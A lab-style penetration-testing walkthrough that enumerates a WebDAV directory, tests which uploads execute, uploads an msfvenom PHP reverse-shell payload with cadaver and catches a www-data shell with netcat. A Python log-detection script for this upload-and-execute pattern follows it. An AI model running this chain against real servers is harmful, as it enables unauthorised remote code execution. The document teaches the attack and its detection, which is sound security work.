The server we are going to audit has the following fingerprint.
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
Next we need to find the WebDAV directory. For this we will use the 'dirb' utility with a common wordlist to look for it.
root@kali:~# dirb http://192.168.155.142/ /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Feb 26 19:05:28 2021
URL_BASE: http://192.168.155.142/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.155.142/ ----
+ http://192.168.155.142/cgi-bin/ (CODE:403|SIZE:296)
==> DIRECTORY: http://192.168.155.142/dav/
+ http://192.168.155.142/index (CODE:200|SIZE:891)
+ http://192.168.155.142/index.php (CODE:200|SIZE:891)
+ http://192.168.155.142/phpinfo (CODE:200|SIZE:48107)
+ http://192.168.155.142/phpinfo.php (CODE:200|SIZE:48119)
dirb found the directory '/dav/', which is the one we will test. We can use nmap again, this time with the http-methods NSE script, to list every HTTP method the server accepts on the WebDAV directory.
sam@kali:~$ nmap -p80 --script http-methods --script-args http-methods.test-all=true,http-methods.url-path='/dav/' 192.168.155.142
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-26 19:38 CST
Nmap scan report for 192.168.155.142
Host is up (0.00040s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-methods:
|   Supported Methods: OPTIONS GET HEAD POST DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK PUT CONNECT
|   Potentially risky methods: DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK PUT CONNECT
|_  Path tested: /dav/

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
sam@kali:~$
As you can see, methods like DELETE, COPY, MOVE and PUT are available to us. What we want to do is upload a file to the server and get a reverse shell. For our next test we will use the 'davtest' utility to check which file types the server lets us upload and which of them it will execute.
sam@kali:~$ davtest -url http://192.168.155.142/dav -cleanup -quiet
/usr/bin/davtest Summary:
Created: http://192.168.155.142/dav/DavTestDir_mJBJrXiU
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.pl
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.jsp
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.jhtml
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.shtml
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.asp
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.aspx
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.cfm
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.html
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.cgi
PUT File: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.txt
Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php
Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.html
Executes: http://192.168.155.142/dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.txt
DELETED: http://192.168.155.142/dav/DavTestDir_mJBJrXiU
sam@kali:~$
davtest came back with some interesting results. We were able to upload a wide range of file types to the remote host, but only three of them are executed when requested. The file type we are concerned with is the '.php' extension, since that runs server-side. We can generate a reverse shell PHP payload with msfvenom to upload to the remote host.
sam@kali:~$ msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.155.128 LPORT=8888 -f raw > payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 30691 bytes
sam@kali:~$
After we generate the payload, we move on to another tool we can use to upload the file to the remote host. The 'cadaver' tool connects to the WebDAV instance and gives us a set of commands to run against it. The command we are interested in is 'put'.
sam@kali:~$ cadaver http://192.168.155.142/dav
dav:/dav/> ?
Available commands:
 ls         cd         pwd        put        get        mget       mput
 edit       less       mkcol      cat        delete     rmcol      copy
 move       lock       unlock     discover   steal      showlocks  version
 checkin    checkout   uncheckout history    label      propnames  chexec
 propget    propdel    propset    search     set        open       close
 echo       quit       unset      lcd        lls        lpwd       logout
 help       describe   about
Aliases: rm=delete, mkdir=mkcol, mv=move, cp=copy, more=less, quit=exit=bye
dav:/dav/> put /home/sam/payload.php
Uploading /home/sam/payload.php to `/dav/payload.php':
Progress: [=============================>] 100.0% of 30686 bytes succeeded.
dav:/dav/>
Our file uploaded successfully. With a listener waiting on port 8888, we can now visit the URL 'http://192.168.155.142/dav/payload.php' to execute the payload, which gives us a reverse shell on the box.
sam@kali:~$ nc -nvlp 8888
Listening on [0.0.0.0] (family 0, port 8888)
Connection from 192.168.155.142 36422 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
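From the defender's side, the whole chain above leaves a clear trace in the Apache access log: a successful PUT of a server-side script under the DAV path, followed by a request for that same path. The following Python script is an added example (not part of the original walkthrough) that runs that detection over constructed log lines; the DAV root, the extension list and the sample lines are assumptions.

```python
import re

# Assumed DAV root and the extensions Apache would hand to a server-side
# interpreter. davtest above only proved .php executes; the rest are common extras.
DAV_ROOT = "/dav/"
EXEC_EXT = (".php", ".phtml", ".php3", ".cgi", ".pl", ".jsp", ".asp", ".aspx")

# Apache combined/common log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

def parse_line(line):
    """Return the interesting fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec

def detect_dav_upload_exec(lines):
    """Flag a 2xx PUT of an executable file under DAV_ROOT (high), and escalate to
    critical when the same path is later fetched with a 200, i.e. the script ran.
    Caveat: a MOVE/COPY that renames x.txt to x.php carries the target in the
    Destination header, which the access log does not record, so it is not caught here."""
    findings, staged = [], {}  # staged: uploaded path -> source IP
    for line in lines:
        r = parse_line(line)
        if r is None or not r["path"].startswith(DAV_ROOT):
            continue
        if r["method"] == "PUT" and 200 <= r["status"] < 300 and r["path"].lower().endswith(EXEC_EXT):
            staged[r["path"]] = r["src"]
            findings.append({"severity": "high", "event": "dav_exec_upload",
                             "src": r["src"], "path": r["path"], "ts": r["ts"]})
        elif r["method"] in ("GET", "POST") and r["status"] == 200 and r["path"] in staged:
            findings.append({"severity": "critical", "event": "dav_uploaded_script_executed",
                             "src": r["src"], "path": r["path"], "ts": r["ts"],
                             "uploaded_by": staged[r["path"]]})
    return findings

# Constructed sample log, modelled on the davtest probe and the cadaver upload above.
SAMPLE_LOG = """\
192.168.155.128 - - [26/Feb/2021:19:41:10 -0600] "PUT /dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php HTTP/1.1" 201 - "-" "constructed"
192.168.155.128 - - [26/Feb/2021:19:41:11 -0600] "GET /dav/DavTestDir_mJBJrXiU/davtest_mJBJrXiU.php HTTP/1.1" 200 31 "-" "constructed"
192.168.155.128 - - [26/Feb/2021:19:41:12 -0600] "DELETE /dav/DavTestDir_mJBJrXiU HTTP/1.1" 204 - "-" "constructed"
192.168.155.128 - - [26/Feb/2021:19:45:03 -0600] "PUT /dav/payload.php HTTP/1.1" 201 - "-" "constructed"
192.168.155.128 - - [26/Feb/2021:19:45:20 -0600] "PUT /dav/notes.txt HTTP/1.1" 201 - "-" "constructed"
192.168.155.128 - - [26/Feb/2021:19:46:30 -0600] "GET /dav/payload.php HTTP/1.1" 200 0 "-" "constructed"
192.168.155.128 - - [26/Feb/2021:19:46:31 -0600] "GET /dav/notes.txt HTTP/1.1" 200 12 "-" "constructed"
10.0.0.5 - - [26/Feb/2021:19:50:00 -0600] "PUT /uploads/x.php HTTP/1.1" 201 - "-" "constructed"
"""

if __name__ == "__main__":
    for f in detect_dav_upload_exec(SAMPLE_LOG.splitlines()):
        print(f["severity"], f["event"], f["src"], f["path"])
```

Run against the sample, it reports the davtest probe and the payload.php upload as high, and the two follow-up GETs as critical; notes.txt and the non-DAV path are ignored.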